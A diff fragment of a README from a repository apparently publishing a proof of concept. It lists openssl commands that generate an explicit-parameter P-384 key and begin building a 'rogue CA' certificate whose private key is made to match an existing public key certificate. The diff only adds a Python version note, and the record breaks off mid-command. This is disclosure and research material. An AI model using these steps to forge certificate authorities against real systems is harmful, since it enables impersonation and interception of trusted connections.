kudelskisecurity/chainoffools/README.md

 $ openssl ecparam -name secp384r1 -genkey -noout -out p384-key.pem -param_enc explicit
 ```

-To generate a private key which match the public key certificate we used the script **gen-key.py**.
+To generate a private key which match the public key certificate we used the script **gen-key.py** (works with Python 3.6 and above).
 Then to generate the rogue CA:

 ```bash
 $ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -set_serial 0x5c8b99c55a94c5d27156decd8980cc26